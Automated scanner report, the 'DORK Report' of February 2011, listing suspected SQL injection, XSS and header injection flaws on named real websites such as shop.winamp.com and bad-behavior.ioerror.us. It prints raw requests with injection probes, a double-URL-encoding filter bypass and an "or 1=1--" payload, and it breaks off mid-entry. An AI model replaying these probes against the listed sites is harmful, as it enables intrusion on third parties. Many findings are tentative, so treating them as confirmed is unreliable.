XSS, SQL Injection, HTTP Header Injection, CWE-79, CWE-89, CWE-113, DORK Report 2-27-2011
1.1. http://bad-behavior.ioerror.us/2011/01/05/bad-behavior-2-1-8/ [REST URL parameter 1]
1.2. http://bad-behavior.ioerror.us/2011/01/05/bad-behavior-2-1-8/ [REST URL parameter 2]
1.3. http://bad-behavior.ioerror.us/2011/01/05/bad-behavior-2-1-8/ [REST URL parameter 3]
1.4. http://bad-behavior.ioerror.us/blog/ [REST URL parameter 1]
1.5. http://bad-behavior.ioerror.us/category/bad-behavior/ [REST URL parameter 2]
1.7. http://bad-behavior.ioerror.us/feed/ [name of an arbitrarily supplied request parameter]
1.8. http://bad-behavior.ioerror.us/feed/atom/ [name of an arbitrarily supplied request parameter]
1.9. https://client.trafficshaping.com/_mint/ [User-Agent HTTP header]
1.10. http://googleads.g.doubleclick.net/pagead/ads [ga_vid parameter]
1.11. http://googleads.g.doubleclick.net/pagead/ads [u_w parameter]
1.12. http://o.aolcdn.com/os_merge/ [file parameter]
1.13. http://peoplepond.com/_mint/ [MintUnique cookie]
1.14. http://shop.winamp.com/store [BIGipServerp-drh-dc1pod5-pool1-active cookie]
1.15. http://shop.winamp.com/store [JSESSIONID cookie]
1.16. http://shop.winamp.com/store [Locale parameter]
1.17. http://shop.winamp.com/store [Referer HTTP header]
1.18. http://shop.winamp.com/store [ThemeID parameter]
1.19. http://shop.winamp.com/store [name of an arbitrarily supplied request parameter]
1.20. http://shop.winamp.com/store [productID parameter]
1.21. http://shop.winamp.com/store [s_pers cookie]
1.22. http://shop.winamp.com/store [s_sess cookie]
1.23. https://shop.winamp.com/store [BIGipServerp-drh-dc1pod5-pool1-active cookie]
1.24. http://static.ak.fbcdn.net/rsrc.php/v1/yF/r/QsQtRaU6mGT.css [REST URL parameter 4]
1.25. http://www.companypond.com/ [name of an arbitrarily supplied request parameter]
1.26. http://www.dreamhost.com/r.cgi [129733 parameter]
1.27. http://www.dreamhost.com/r.cgi [name of an arbitrarily supplied request parameter]
1.28. http://www.sti-cs.com/Portfolio/Trades-and-Exhibits/id-24/page-1/ [REST URL parameter 3]
1.29. http://www.sti-cs.com/Portfolio/Trades-and-Exhibits/id-25/page-1/ [REST URL parameter 3]
1.30. http://www.sti-cs.com/Portfolio/Trades-and-Exhibits/id-7/page-1/ [REST URL parameter 3]
2.1. http://ad.doubleclick.net/adj/N2998.159462.7724395940621/B4924654.4 [REST URL parameter 1]
2.2. http://ad.doubleclick.net/adj/N2998.159462.7724395940621/B5077405.10 [REST URL parameter 1]
2.3. http://bs.serving-sys.com/BurstingPipe/adServer.bs [eyeblaster cookie]
2.5. http://tacoda.at.atwola.com/rtx/r.js [N cookie]
2.6. http://tacoda.at.atwola.com/rtx/r.js [si parameter]
2.7. http://tags.crwdcntrl.net/5/c=25/b=1225394 [name of an arbitrarily supplied request parameter]
2.8. http://tags.crwdcntrl.net/5/c=25/b=1225400 [name of an arbitrarily supplied request parameter]
2.9. http://tags.crwdcntrl.net/5/c=25/b=1226041 [name of an arbitrarily supplied request parameter]
3. Cross-site scripting (reflected)
3.1. http://ads.tw.adsonar.com/adserving/getAds.jsp [pid parameter]
3.2. http://ads.tw.adsonar.com/adserving/getAds.jsp [placementId parameter]
3.3. http://ads.tw.adsonar.com/adserving/getAds.jsp [ps parameter]
3.4. http://alterianwaserver.alterianconnect.net/tracking.aspx/gettoken/ [callback parameter]
3.5. http://alterianwaserver.alterianconnect.net/tracking.aspx/submitevents/ [callback parameter]
3.6. http://alterianwaserver.alterianconnect.net/tracking.aspx/submitsession/ [callback parameter]
3.7. http://altfarm.mediaplex.com/ad/js/3992-121072-16279-0 [mpt parameter]
3.8. http://altfarm.mediaplex.com/ad/js/3992-121072-16279-0 [mpvc parameter]
3.10. http://api.postup.com/TCTUL001/twidget/1.jsonp [jsonp parameter]
3.11. http://apps.conduit-banners.com/TechCrunchApp-Techcrunch_APP [imageurl parameter]
3.12. http://b.scorecardresearch.com/beacon.js [c1 parameter]
3.13. http://b.scorecardresearch.com/beacon.js [c10 parameter]
3.14. http://b.scorecardresearch.com/beacon.js [c15 parameter]
3.15. http://b.scorecardresearch.com/beacon.js [c2 parameter]
3.16. http://b.scorecardresearch.com/beacon.js [c3 parameter]
3.17. http://b.scorecardresearch.com/beacon.js [c4 parameter]
3.18. http://b.scorecardresearch.com/beacon.js [c5 parameter]
3.19. http://b.scorecardresearch.com/beacon.js [c6 parameter]
3.34. https://client.trafficshaping.com/signin [email parameter]
3.35. http://dean.edwards.name/weblog/2006/03/faster [REST URL parameter 1]
3.36. http://dean.edwards.name/weblog/2006/03/faster [REST URL parameter 1]
3.37. http://dean.edwards.name/weblog/2006/03/faster [REST URL parameter 4]
3.38. http://dean.edwards.name/weblog/2006/06/again/ [REST URL parameter 1]
3.39. http://dean.edwards.name/weblog/2006/06/again/ [REST URL parameter 1]
3.40. http://dean.edwards.name/weblog/2006/06/again/ [REST URL parameter 4]
3.42. https://event.on24.com/eventRegistration/EventLobbyServlet [key parameter]
3.43. https://event.on24.com/eventRegistration/EventLobbyServlet [partnerref parameter]
3.44. https://event.on24.com/eventRegistration/EventLobbyServlet [sourcepage parameter]
3.45. http://init.zopim.com/register [mID parameter]
3.46. http://lfov.net/webrecorder/g/chimera.js [vid parameter]
3.47. http://odb.outbrain.com/utils/get [callback parameter]
3.48. https://shop.winamp.com/DRHM/store [name of an arbitrarily supplied request parameter]
3.49. https://shop.winamp.com/store [name of an arbitrarily supplied request parameter]
3.50. http://widgets.digg.com/buttons/count [url parameter]
3.51. http://www.business-software.com/top-10-web-content-management-vendors.php [gclid parameter]
3.52. http://www.business-software.com/top-10-web-content-management-vendors.php [keyword parameter]
3.54. http://www.business-software.com/top-10-web-content-management-vendors.php [track parameter]
3.55. http://www.business-software.com/top-10-web-content-management-vendors.php [traffic parameter]
3.56. http://www.linkedin.com/cws/share-count [url parameter]
3.57. http://www.paperthin.com/_cs_apps/ajaxProxy.cfm [bean parameter]
3.58. http://www.paperthin.com/_cs_apps/ajaxProxy.cfm [method parameter]
3.60. http://www.prchecker.info/check_page_rank.php [urlo parameter]
3.61. http://www.sti-cs.com/Portfolio/Trades-and-Exhibits/id-24/page-1/ [REST URL parameter 3]
3.62. http://www.sti-cs.com/Portfolio/Trades-and-Exhibits/id-25/page-1/ [REST URL parameter 3]
3.63. http://www.sti-cs.com/Portfolio/Trades-and-Exhibits/id-7/page-1/ [REST URL parameter 3]
3.64. http://www.watchmouse.com/assets/css/print.css [REST URL parameter 3]
3.65. http://www.watchmouse.com/assets/css/screen.css [REST URL parameter 3]
3.66. http://www.watchmouse.com/en/ [REST URL parameter 1]
3.67. http://www.watchmouse.com/en/ [name of an arbitrarily supplied request parameter]
3.68. http://www.watchmouse.com/en/api/checkreferrer.php [REST URL parameter 3]
3.69. http://www.winamp.com/media-player/en [REST URL parameter 2]
3.70. https://www14.software.ibm.com/webapp/iwm/web/signup.do [ck parameter]
3.71. https://www14.software.ibm.com/webapp/iwm/web/signup.do [cm parameter]
3.72. https://www14.software.ibm.com/webapp/iwm/web/signup.do [cmp parameter]
3.73. https://www14.software.ibm.com/webapp/iwm/web/signup.do [cr parameter]
3.74. https://www14.software.ibm.com/webapp/iwm/web/signup.do [csr parameter]
3.75. https://www14.software.ibm.com/webapp/iwm/web/signup.do [ct parameter]
3.76. https://www14.software.ibm.com/webapp/iwm/web/signup.do [mkwid parameter]
3.78. https://event.on24.com/eventRegistration/EventLobbyServlet [User-Agent HTTP header]
3.79. https://login.oracle.com/mysso/signon.jsp [Referer HTTP header]
3.80. https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login [Referer HTTP header]
3.81. http://telligent.com/products/request_a_demo.aspx [Referer HTTP header]
3.82. http://telligent.com/resources/m/analysts/1343205.aspx [Referer HTTP header]
3.83. http://telligent.com/resources/m/analysts/1345217.aspx [Referer HTTP header]
3.84. http://telligent.com/resources/m/success_stories/1331597.aspx [Referer HTTP header]
3.85. http://telligent.com/support/request_an_upgrade/ [Referer HTTP header]
3.86. http://www.watchmouse.com/en/ [Referer HTTP header]
3.87. http://bs.serving-sys.com/BurstingPipe/adServer.bs [eyeblaster cookie]
3.88. http://seg.sharethis.com/getSegment.php [__stid cookie]
3.89. http://www.winamp.com/ [countryCookie cookie]
3.90. http://www.winamp.com/media-player/en [countryCookie cookie]
3.91. http://www.winamp.com/skin/slick-redux/222084 [countryCookie cookie]
4.1. http://r.nexac.com/e/getdata.xgi [ru parameter]
4.2. http://tags.crwdcntrl.net/5/c=25/b=1225394 [name of an arbitrarily supplied request parameter]
4.3. http://tags.crwdcntrl.net/5/c=25/b=1225400 [name of an arbitrarily supplied request parameter]
4.4. http://tags.crwdcntrl.net/5/c=25/b=1226041 [name of an arbitrarily supplied request parameter]
1. SQL injection next
There are 30 instances of this issue:
- http://bad-behavior.ioerror.us/2011/01/05/bad-behavior
-2-1-8/ [REST URL parameter 1] - http://bad-behavior.ioerror.us/2011/01/05/bad-behavior
-2-1-8/ [REST URL parameter 2] - http://bad-behavior.ioerror.us/2011/01/05/bad-behavior
-2-1-8/ [REST URL parameter 3] - http://bad-behavior.ioerror.us/blog/ [REST URL parameter 1]
- http://bad-behavior.ioerror.us/category/bad-behavior/ [REST URL parameter 2]
- http://bad-behavior.ioerror.us/category/bad-behavior/ [name of an arbitrarily supplied request parameter]
- http://bad-behavior.ioerror.us/feed/ [name of an arbitrarily supplied request parameter]
- http://bad-behavior.ioerror.us/feed/atom/ [name of an arbitrarily supplied request parameter]
- https://client.trafficshaping.com/_mint/ [User-Agent HTTP header]
- http://googleads.g.doubleclick.net/pagead/ads [ga_vid parameter]
- http://googleads.g.doubleclick.net/pagead/ads [u_w parameter]
- http://o.aolcdn.com/os_merge/ [file parameter]
- http://peoplepond.com/_mint/ [MintUnique cookie]
- http://shop.winamp.com/store [BIGipServerp-drh-dc1pod5
-pool1-active cookie] - http://shop.winamp.com/store [JSESSIONID cookie]
- http://shop.winamp.com/store [Locale parameter]
- http://shop.winamp.com/store [Referer HTTP header]
- http://shop.winamp.com/store [ThemeID parameter]
- http://shop.winamp.com/store [name of an arbitrarily supplied request parameter]
- http://shop.winamp.com/store [productID parameter]
- http://shop.winamp.com/store [s_pers cookie]
- http://shop.winamp.com/store [s_sess cookie]
- https://shop.winamp.com/store [BIGipServerp-drh-dc1pod5
-pool1-active cookie] - http://static.ak.fbcdn.net/rsrc.php/v1/yF/r
/QsQtRaU6mGT.css [REST URL parameter 4] - http://www.companypond.com/ [name of an arbitrarily supplied request parameter]
- http://www.dreamhost.com/r.cgi [129733 parameter]
- http://www.dreamhost.com/r.cgi [name of an arbitrarily supplied request parameter]
- http://www.sti-cs.com/Portfolio/Trades-and
-Exhibits/id-24/page-1/ [REST URL parameter 3] - http://www.sti-cs.com/Portfolio/Trades-and
-Exhibits/id-25/page-1/ [REST URL parameter 3] - http://www.sti-cs.com/Portfolio/Trades-and
-Exhibits/id-7/page-1/ [REST URL parameter 3]
Issue background
SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.
1.1. http://bad-behavior.ioerror.us/2011/01/05/bad-behavior-2-1-8/ [REST URL parameter 1] next
Summary
Severity: | High |
Confidence: | Firm |
Host: | http://bad-behavior |
Path: | /2011/01/05/bad-behavior |
Issue detail
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.The database appears to be PostgreSQL.
Request
GET /2011'/01/05/bad-behavior-2-1-8 Host: bad-behavior.ioerror.us Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: bb2_screener_=1298752932 |
Response (redirected)
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Sat, 26 Feb 2011 23:13:19 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/5.3.4 Set-Cookie: bb2_screener_=1298761999 Vary: Cookie X-Pingback: http://bad-behavior Link: <http://bad-behavior Content-Length: 26787 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head profile="http://gmpg.org <meta property= ...[SNIP]... 2.0 requires PHP 4.3 or later, and 2.1 requires PHP 5.2 or later (5.3 when running on Windows). Both releases require MySQL 4.0 or later when using a database. I have had code contributed which offers PostgreSQL support and I will be integrating this soon. Note that as 2.1 is still the development branch, requirements may change (up or down) as development progresses.</p> ...[SNIP]... |
1.2. http://bad-behavior.ioerror.us/2011/01/05/bad-behavior-2-1-8/ [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Firm |
Host: | http://bad-behavior |
Path: | /2011/01/05/bad-behavior |
Issue detail
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.The database appears to be PostgreSQL.
Request
GET /2011/01'/05/bad-behavior-2-1-8/ HTTP/1.1 Host: bad-behavior.ioerror.us Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: bb2_screener_=1298752932 |
Response (redirected)
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Sat, 26 Feb 2011 23:13:25 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/5.3.4 Set-Cookie: bb2_screener_=1298762005 Vary: Cookie X-Pingback: http://bad-behavior Link: <http://bad-behavior Content-Length: 26787 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head profile="http://gmpg.org <meta property= ...[SNIP]... 2.0 requires PHP 4.3 or later, and 2.1 requires PHP 5.2 or later (5.3 when running on Windows). Both releases require MySQL 4.0 or later when using a database. I have had code contributed which offers PostgreSQL support and I will be integrating this soon. Note that as 2.1 is still the development branch, requirements may change (up or down) as development progresses.</p> ...[SNIP]... |
1.3. http://bad-behavior.ioerror.us/2011/01/05/bad-behavior-2-1-8/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Firm |
Host: | http://bad-behavior |
Path: | /2011/01/05/bad-behavior |
Issue detail
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 3, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.The database appears to be PostgreSQL.
Request
GET /2011/01/05'/bad-behavior-2-1-8/ HTTP/1.1 Host: bad-behavior.ioerror.us Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: bb2_screener_=1298752932 |
Response (redirected)
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Sat, 26 Feb 2011 23:13:31 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/5.3.4 Set-Cookie: bb2_screener_=1298762011 Vary: Cookie X-Pingback: http://bad-behavior Link: <http://bad-behavior Content-Length: 26788 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head profile="http://gmpg.org <meta property= ...[SNIP]... 2.0 requires PHP 4.3 or later, and 2.1 requires PHP 5.2 or later (5.3 when running on Windows). Both releases require MySQL 4.0 or later when using a database. I have had code contributed which offers PostgreSQL support and I will be integrating this soon. Note that as 2.1 is still the development branch, requirements may change (up or down) as development progresses.</p> ...[SNIP]... |
1.4. http://bad-behavior.ioerror.us/blog/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Firm |
Host: | http://bad-behavior |
Path: | /blog/ |
Issue detail
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.The database appears to be PostgreSQL.
Request
GET /blog'/ HTTP/1.1 Host: bad-behavior.ioerror.us Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: bb2_screener_=1298752932 |
Response (redirected)
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Sat, 26 Feb 2011 23:12:59 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/5.3.4 Set-Cookie: bb2_screener_=1298761978 Vary: Cookie X-Pingback: http://bad-behavior Content-Length: 72723 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head profile="http://gmpg.org <meta property= ...[SNIP]... 2.0 requires PHP 4.3 or later, and 2.1 requires PHP 5.2 or later (5.3 when running on Windows). Both releases require MySQL 4.0 or later when using a database. I have had code contributed which offers PostgreSQL support and I will be integrating this soon. Note that as 2.1 is still the development branch, requirements may change (up or down) as development progresses.</p> ...[SNIP]... |
1.5. http://bad-behavior.ioerror.us/category/bad-behavior/ [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Firm |
Host: | http://bad-behavior |
Path: | /category/bad-behavior/ |
Issue detail
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.The database appears to be PostgreSQL.
Request
GET /category/bad-behavior'/ HTTP/1.1 Host: bad-behavior.ioerror.us Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: bb2_screener_=1298752932 |
Response (redirected)
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Sat, 26 Feb 2011 23:14:20 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/5.3.4 Set-Cookie: bb2_screener_=1298762060 Vary: Cookie X-Pingback: http://bad-behavior Content-Length: 51665 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head profile="http://gmpg.org <meta property= ...[SNIP]... 2.0 requires PHP 4.3 or later, and 2.1 requires PHP 5.2 or later (5.3 when running on Windows). Both releases require MySQL 4.0 or later when using a database. I have had code contributed which offers PostgreSQL support and I will be integrating this soon. Note that as 2.1 is still the development branch, requirements may change (up or down) as development progresses.</p> ...[SNIP]... |
1.6. http://bad-behavior.ioerror.us/category/bad-behavior/ [name of an arbitrarily supplied request parameter] previous next
Summary
Severity: | High |
Confidence: | Firm |
Host: | http://bad-behavior |
Path: | /category/bad-behavior/ |
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload %2527 was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.The database appears to be PostgreSQL.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Request
GET /category/bad-behavior/?1%2527=1 HTTP/1.1 Host: bad-behavior.ioerror.us Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: bb2_screener_=1298752932 |
Response (redirected)
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Sat, 26 Feb 2011 23:13:39 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/5.3.4 Set-Cookie: bb2_screener_=1298762019 Vary: Cookie X-Pingback: http://bad-behavior Content-Length: 51670 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head profile="http://gmpg.org <meta property= ...[SNIP]... 2.0 requires PHP 4.3 or later, and 2.1 requires PHP 5.2 or later (5.3 when running on Windows). Both releases require MySQL 4.0 or later when using a database. I have had code contributed which offers PostgreSQL support and I will be integrating this soon. Note that as 2.1 is still the development branch, requirements may change (up or down) as development progresses.</p> ...[SNIP]... |
1.7. http://bad-behavior.ioerror.us/feed/ [name of an arbitrarily supplied request parameter] previous next
Summary
Severity: | High |
Confidence: | Firm |
Host: | http://bad-behavior |
Path: | /feed/ |
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload %2527 was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.The database appears to be PostgreSQL.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Request
GET /feed/?1%2527=1 HTTP/1.1 Host: bad-behavior.ioerror.us Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: bb2_screener_=1298752932 |
Response (redirected)
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Sat, 26 Feb 2011 23:11:36 GMT Content-Type: text/xml; charset=UTF-8 Connection: close X-Powered-By: PHP/5.3.4 Set-Cookie: bb2_screener_=1298761895 Vary: Cookie X-Pingback: http://bad-behavior Last-Modified: Tue, 15 Feb 2011 06:24:42 GMT ETag: "d0aa19c0e184cf0e188 Content-Length: 41692 <?xml version="1.0" encoding="UTF-8"?> <rss version="2.0" xmlns:content="http:/ xmlns:wfw="http:/ xmlns:dc="http://purl.org ...[SNIP]... 2.0 requires PHP 4.3 or later, and 2.1 requires PHP 5.2 or later (5.3 when running on Windows). Both releases require MySQL 4.0 or later when using a database. I have had code contributed which offers PostgreSQL support and I will be integrating this soon. Note that as 2.1 is still the development branch, requirements may change (up or down) as development progresses.</p> ...[SNIP]... |
1.8. http://bad-behavior.ioerror.us/feed/atom/ [name of an arbitrarily supplied request parameter] previous next
Summary
Severity: | High |
Confidence: | Firm |
Host: | http://bad-behavior |
Path: | /feed/atom/ |
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload %2527 was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.The database appears to be PostgreSQL.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Request
GET /feed/atom/?1%2527=1 HTTP/1.1 Host: bad-behavior.ioerror.us Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: bb2_screener_=1298752932 |
Response (redirected)
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Sat, 26 Feb 2011 23:11:42 GMT Content-Type: application/atom+xml; charset=UTF-8 Connection: close X-Powered-By: PHP/5.3.4 Set-Cookie: bb2_screener_=1298761902 Vary: Cookie X-Pingback: http://bad-behavior Last-Modified: Tue, 15 Feb 2011 06:24:42 GMT ETag: "d0aa19c0e184cf0e188 Content-Length: 45367 <?xml version="1.0" encoding="UTF-8"?><feed xmlns="http://www.w3.org xmlns:thr="http://purl xml:lang="en" xml:base="http://bad ...[SNIP]... 2.0 requires PHP 4.3 or later, and 2.1 requires PHP 5.2 or later (5.3 when running on Windows). Both releases require MySQL 4.0 or later when using a database. I have had code contributed which offers PostgreSQL support and I will be integrating this soon. Note that as 2.1 is still the development branch, requirements may change (up or down) as development progresses.</p> ...[SNIP]... |
1.9. https://client.trafficshaping.com/_mint/ [User-Agent HTTP header] previous next
Summary
Severity: | High |
Confidence: | Tentative |
Host: | https://client.traff |
Path: | /_mint/ |
Issue detail
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. The payloads 20435182'%20or%201%3d1--Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /_mint/?js HTTP/1.1 Host: client.trafficshaping.com Connection: keep-alive Referer: https://client.traff Cache-Control: max-age=0 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.1320435182'%20or%201%3d1-- Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: csId=3922e3f116c2b71 |
Response 1
HTTP/1.1 200 OK Date: Sun, 27 Feb 2011 16:52:18 GMT Server: Apache/2.2.9 (Debian) PHP/5.3.3-0.dotdeb.1 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g X-Powered-By: PHP/5.3.3-0.dotdeb.1 P3P: CP="NOI NID ADMa OUR IND COM NAV STA LOC" Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Sun, 27 Feb 2011 16:52:18 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: MintAcceptsCookies=1; path=/; domain=.client.traff Content-Length: 2003 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/javascript var Mint = new Object(); Mint.save = function() { var now = new Date(); var debug = false; // this is set by php if (window.location.hash == '#Mint:Debug') { debug = true; }; var path = 'http://www.traffics path = path.replace(/^https?:/, window.location.protocol) // Loop through the different plug-ins to assemble the query string for (var developer in this) { for (var plugin in this[developer]) { if (this[developer][plugin] && this[developer][plugin] { path += this[developer][plugin] }; }; }; // Slap the current time on there to prevent caching on subsequent page views in a few browsers path += '&'+now.getTime(); // Redirect to the debug page if (debug) { window.open(path+'&debug var ie = /*@cc_on!@*/0; if (!ie && document.getElements { var tag = (document.createElementNS tag.type = 'text/javascript'; tag.src = path + '&serve_js'; document.getElements } else if (document.write) { document.write('<' + 'script type="text/javascript" src="' + path + '&serve_js"><' + '/script>'); }; }; if (!Mint.SI) { Mint.SI = new Object(); } Mint.SI.Referrer = { onsave : function() { var encoded = 0; if (typeof Mint_SI_DocumentTitle == 'undefined') { Mint_SI_DocumentTitle = document.title; } else { encoded = 1; }; var referer = (window.decodeURI)?window var resource = (window.decodeURI)?window return '&referer=' + escape(referer) + '&resource=' + escape(resource) + '&resource_title=' + escape(Mint_SI_Docum } }; Mint.save(); |
Request 2
GET /_mint/?js HTTP/1.1 Host: client.trafficshaping.com Connection: keep-alive Referer: https://client.traff Cache-Control: max-age=0 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.1320435182'%20or%201%3d2-- Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: csId=3922e3f116c2b71 |
Response 2
HTTP/1.1 200 OK Date: Sun, 27 Feb 2011 16:52:19 GMT Server: Apache/2.2.9 (Debian) PHP/5.3.3-0.dotdeb.1 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g X-Powered-By: PHP/5.3.3-0.dotdeb.1 P3P: CP="NOI NID ADMa OUR IND COM NAV STA LOC" Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Sun, 27 Feb 2011 16:52:19 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: MintAcceptsCookies=1; path=/; domain=.client.traff Content-Length: 2015 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/javascript var Mint = new Object(); Mint.save = function() { var now = new Date(); var debug = false; // this is set by php if (window.location.hash == '#Mint:Debug') { debug = true; }; var path = 'http://www.traffics path = path.replace(/^https?:/, window.location.protocol) // Loop through the different plug-ins to assemble the query string for (var developer in this) { for (var plugin in this[developer]) { if (this[developer][plugin] && this[developer][plugin] { path += this[developer][plugin] }; }; }; // Slap the current time on there to prevent caching on subsequent page views in a few browsers path += '&'+now.getTime(); // Redirect to the debug page if (debug) { window.open(path+'&debug var ie = /*@cc_on!@*/0; if (!ie && document.getElements { var tag = (document.createElementNS tag.type = 'text/javascript'; tag.src = path + '&serve_js'; document.getElements } else if (document.write) { document.write('<' + 'script type="text/javascript" src="' + path + '&serve_js"><' + '/script>'); }; }; if (!Mint.SI) { Mint.SI = new Object(); } Mint.SI.Referrer = { onsave : function() { var encoded = 0; if (typeof Mint_SI_DocumentTitle == 'undefined') { Mint_SI_DocumentTitle = document.title; } else { encoded = 1; }; var referer = (window.decodeURI)?window var resource = (window.decodeURI)?window return '&referer=' + escape(referer) + '&resource=' + escape(resource) + '&resource_title=' + escape(Mint_SI_Docum } }; Mint.save(); |
1.10. http://googleads.g.doubleclick.net/pagead/ads [ga_vid parameter] previous next
Summary
Severity: | High |
Confidence: | Tentative |
Host: | http://googleads.g |
Path: | /pagead/ads |
Issue detail
The ga_vid parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ga_vid parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Request 1
